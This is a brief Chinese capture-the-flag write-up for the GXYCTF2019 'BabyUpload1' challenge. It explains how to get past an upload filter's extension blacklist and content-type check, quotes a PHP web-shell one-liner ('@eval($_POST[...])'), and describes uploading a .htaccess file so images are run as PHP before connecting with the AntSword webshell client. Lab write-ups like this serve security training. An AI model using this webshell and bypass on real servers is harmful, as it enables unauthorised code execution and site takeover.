[GXYCTF2019]BabyUpload1

尝试各种文件,黑名单过滤后缀ph,content-type限制image/jpeg

[GXYCTF2019]BabyUpload1_第1张图片 

内容过滤@eval($_POST['cmdjs']);

[GXYCTF2019]BabyUpload1_第2张图片

上传.htaccess将上传的文件当作php解析

[GXYCTF2019]BabyUpload1_第3张图片

蚁剑连接得到flag

[GXYCTF2019]BabyUpload1_第4张图片

你可能感兴趣的:(web)